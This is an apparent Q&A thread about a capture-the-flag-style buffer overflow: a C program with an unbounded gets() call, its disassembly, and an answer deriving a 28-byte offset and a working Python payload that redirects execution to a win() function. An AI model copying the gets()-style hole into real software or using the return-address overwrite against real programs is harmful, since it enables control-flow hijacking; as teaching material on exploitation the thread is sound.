gcc assembly x86 buffer-overflow exploit

Buffer overflow: overrwrite CH

I have a program that is vulnerable to buffer overflow. The function that is vulnerable takes 2 arguments. The first is a standard 4 bytes. For the second however, the program performs the following:

xor ch, 0
...
cmp     dword ptr [ebp+10h], 0F00DB4BE

Now, if I supply 2 different 4 byte argument, as part of my exploit, i.e. ABCDEFGH (assume ABCD is the first argument, EFGH the second), CH becomes G. So naturally I thought about crafting the following (assume ABCD is right):

ABCD\x00\x0d\x00\x00

What happens however, is that nullbutes seem to be ignored! Sending the above results in CH = 0 and CL = 0xd. This happens no matter where I put \x0d i.e.:

ABCD\x0d\x00\x00\x00 ABCD\x00\x0d\x00\x00 ABCD\x00\x00\x0d\x00 ABCD\x00\x00\x00\x0d

all yield that same behavior.

How can I proceed to only overwrite CH while leaving the rest of ECX as null?

EDIT: see my own answer below. The short version is that bash ignores null bytes and it explains, partially, why the exploit didn't work locally. The exact reason can be found here. Thanks to Michael Petch for pointing it out!

Source:

#include <stdio.h>
#include <stdlib.h>

void win(long long arg1, int arg2)
{
    if (arg1 != 0x14B4DA55 || arg2 != 0xF00DB4BE)
    {
        puts("Close, but not quite.");
        exit(1);
    }

    printf("You win!\n");

}

void vuln()
{
    char buf[16];
    printf("Type something>");
    gets(buf);
    printf("You typed %s!\n", buf);
}

int main()
{
    /* Disable buffering on stdout */
    setvbuf(stdout, NULL, _IONBF, 0);

    vuln();
    return 0;
}

The relevant part of objdump's disassembly of the executable is:

080491c2 <win>:
 80491c2:       55                      push   %ebp
 80491c3:       89 e5                   mov    %esp,%ebp
 80491c5:       81 ec 28 01 00 00       sub    $0x128,%esp
 80491cb:       8b 4d 08                mov    0x8(%ebp),%ecx
 80491ce:       89 8d e0 fe ff ff       mov    %ecx,-0x120(%ebp)
 80491d4:       8b 4d 0c                mov    0xc(%ebp),%ecx
 80491d7:       89 8d e4 fe ff ff       mov    %ecx,-0x11c(%ebp)
 80491dd:       8b 8d e0 fe ff ff       mov    -0x120(%ebp),%ecx
 80491e3:       81 f1 55 da b4 14       xor    $0x14b4da55,%ecx
 80491e9:       89 c8                   mov    %ecx,%eax
 80491eb:       8b 8d e4 fe ff ff       mov    -0x11c(%ebp),%ecx
 80491f1:       80 f5 00                xor    $0x0,%ch
 80491f4:       89 ca                   mov    %ecx,%edx
 80491f6:       09 d0                   or     %edx,%eax
 80491f8:       85 c0                   test   %eax,%eax
 80491fa:       75 09                   jne    8049205 <win+0x43>
 80491fc:       81 7d 10 be b4 0d f0    cmpl   $0xf00db4be,0x10(%ebp)
 8049203:       74 1a                   je     804921f <win+0x5d>
 8049205:       83 ec 0c                sub    $0xc,%esp
 8049208:       68 08 a0 04 08          push   $0x804a008
 804920d:       e8 4e fe ff ff          call   8049060 <puts@plt>
 8049212:       83 c4 10                add    $0x10,%esp
 8049215:       83 ec 0c                sub    $0xc,%esp
 8049218:       6a 01                   push   $0x1
 804921a:       e8 51 fe ff ff          call   8049070 <exit@plt>
 804921f:       83 ec 0c                sub    $0xc,%esp
 8049222:       68 1e a0 04 08          push   $0x804a01e
 8049227:       e8 34 fe ff ff          call   8049060 <puts@plt>
 804922c:       83 c4 10                add    $0x10,%esp
 804922f:       83 ec 08                sub    $0x8,%esp
 8049232:       68 27 a0 04 08          push   $0x804a027
 8049237:       68 29 a0 04 08          push   $0x804a029
 804923c:       e8 5f fe ff ff          call   80490a0 <fopen@plt>
 8049241:       83 c4 10                add    $0x10,%esp
 8049244:       89 45 f4                mov    %eax,-0xc(%ebp)
 8049247:       83 7d f4 00             cmpl   $0x0,-0xc(%ebp)
 804924b:       75 12                   jne    804925f <win+0x9d>
 804924d:       83 ec 0c                sub    $0xc,%esp
 8049250:       68 34 a0 04 08          push   $0x804a034
 8049255:       e8 06 fe ff ff          call   8049060 <puts@plt>
 804925a:       83 c4 10                add    $0x10,%esp
 804925d:       eb 31                   jmp    8049290 <win+0xce>
 804925f:       83 ec 04                sub    $0x4,%esp
 8049262:       ff 75 f4                pushl  -0xc(%ebp)
 8049265:       68 00 01 00 00          push   $0x100
 804926a:       8d 85 f4 fe ff ff       lea    -0x10c(%ebp),%eax
 8049270:       50                      push   %eax
 8049271:       e8 da fd ff ff          call   8049050 <fgets@plt>
 8049276:       83 c4 10                add    $0x10,%esp
 8049279:       83 ec 08                sub    $0x8,%esp
 804927c:       8d 85 f4 fe ff ff       lea    -0x10c(%ebp),%eax
 8049282:       50                      push   %eax
 8049283:       68 86 a0 04 08          push   $0x804a086
 8049288:       e8 a3 fd ff ff          call   8049030 <printf@plt>
 804928d:       83 c4 10                add    $0x10,%esp
 8049290:       90                      nop
 8049291:       c9                      leave
 8049292:       c3                      ret

08049293 <vuln>:
 8049293:       55                      push   %ebp
 8049294:       89 e5                   mov    %esp,%ebp
 8049296:       83 ec 18                sub    $0x18,%esp
 8049299:       83 ec 0c                sub    $0xc,%esp
 804929c:       68 90 a0 04 08          push   $0x804a090
 80492a1:       e8 8a fd ff ff          call   8049030 <printf@plt>
 80492a6:       83 c4 10                add    $0x10,%esp
 80492a9:       83 ec 0c                sub    $0xc,%esp
 80492ac:       8d 45 e8                lea    -0x18(%ebp),%eax
 80492af:       50                      push   %eax
 80492b0:       e8 8b fd ff ff          call   8049040 <gets@plt>
 80492b5:       83 c4 10                add    $0x10,%esp
 80492b8:       83 ec 08                sub    $0x8,%esp
 80492bb:       8d 45 e8                lea    -0x18(%ebp),%eax
 80492be:       50                      push   %eax
 80492bf:       68 a0 a0 04 08          push   $0x804a0a0
 80492c4:       e8 67 fd ff ff          call   8049030 <printf@plt>
 80492c9:       83 c4 10                add    $0x10,%esp
 80492cc:       90                      nop
 80492cd:       c9                      leave
 80492ce:       c3                      ret

080492cf <main>:
 80492cf:       8d 4c 24 04             lea    0x4(%esp),%ecx
 80492d3:       83 e4 f0                and    $0xfffffff0,%esp
 80492d6:       ff 71 fc                pushl  -0x4(%ecx)
 80492d9:       55                      push   %ebp
 80492da:       89 e5                   mov    %esp,%ebp
 80492dc:       51                      push   %ecx
 80492dd:       83 ec 04                sub    $0x4,%esp
 80492e0:       a1 34 c0 04 08          mov    0x804c034,%eax
 80492e5:       6a 00                   push   $0x0
 80492e7:       6a 02                   push   $0x2
 80492e9:       6a 00                   push   $0x0
 80492eb:       50                      push   %eax
 80492ec:       e8 9f fd ff ff          call   8049090 <setvbuf@plt>
 80492f1:       83 c4 10                add    $0x10,%esp
 80492f4:       e8 9a ff ff ff          call   8049293 <vuln>
 80492f9:       b8 00 00 00 00          mov    $0x0,%eax
 80492fe:       8b 4d fc                mov    -0x4(%ebp),%ecx
 8049301:       c9                      leave
 8049302:       8d 61 fc                lea    -0x4(%ecx),%esp
 8049305:       c3                      ret

Solution

It is unclear why you are hung up on the value in ECX or the xor ch, 0 instruction inside the win function. From the C code it is clear that the check for a win requires that the 64-bit (long long) arg1 to be 0x14B4DA55 and arg2 needs to be 0xF00DB4BE. When that condition is met it will print You win!

We need some kind of buffer exploit that has the capability to execute the win function and make it appear that it is being passed a first argument (64-bit long long) and a 32-bit int as a second parameter.

The most obvious way to pull this off is overrun buf in function vuln that strategically overwrites the return address and replaces it with the address of win. In the disassembled output win is at 0x080491c2. We will need to write 0x080491c2 followed by some dummy value for a return address, followed by the 64-bit value 0x14B4DA55 (same as 0x0000000014B4DA55 ) followed by the 32-bit value 0xF00DB4BE.

The dummy value for a return address is needed because we need to simulate a function call on the stack. We won't be issuing a call instruction so we have to make it appear as if one had been done. The goal is to print You win! whether the program crashes after that isn't relevant.

The return address (win), arg1, and arg2 will have to be stored as bytes in reverse order since the x86 processors are little endian.

The last big question is how many bytes do we have to feed to gets to overrun the buffer to reach the return address? You could use trial and error (bruteforce) to figure this out, but we can look at the disassembly of the call to gets:

 80492ac:       8d 45 e8                lea    -0x18(%ebp),%eax
 80492af:       50                      push   %eax
 80492b0:       e8 8b fd ff ff          call   8049040 <gets@plt

LEA is being used to compute the address (Effective Address) of buf on the stack and passing that as the first argument to gets. 0x18 is 24 bytes (decimal). Although buf was defined to be 16 bytes in length the compiler also allocated additional space for alignment purposes. We have to add an additional 4 bytes to account for the fact that the function prologue pushed EBP on the stack. That is a total of 28 bytes (24+4) to reach the position of the return address on the stack.

Using PYTHON to generate the input sequence is common in many tutorials. Embedding NUL(\0) characters in a shell string directly may cause a shell program to prematurely terminate a string at the NUL byte (an issue that people have when using BASH). We can pipe the byte sequence to our program using something like:

python -c 'print "A"*28+"\xc2\x91\x04\x08" \
    +"B"*4+"\x55\xda\xb4\x14\x00\x00\x00\x00\xbe\xb4\x0d\xf0"' | ./progname

Where progname is the name of your executable. When run it should appear similar to:

Type something>You typed AAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBUڴ!
You win!
Segmentation fault

Note: the 4 characters making up the return address between the A's and B's are unprintable so they don't appear in the console output but they are still present as well as all the other unprintable characters.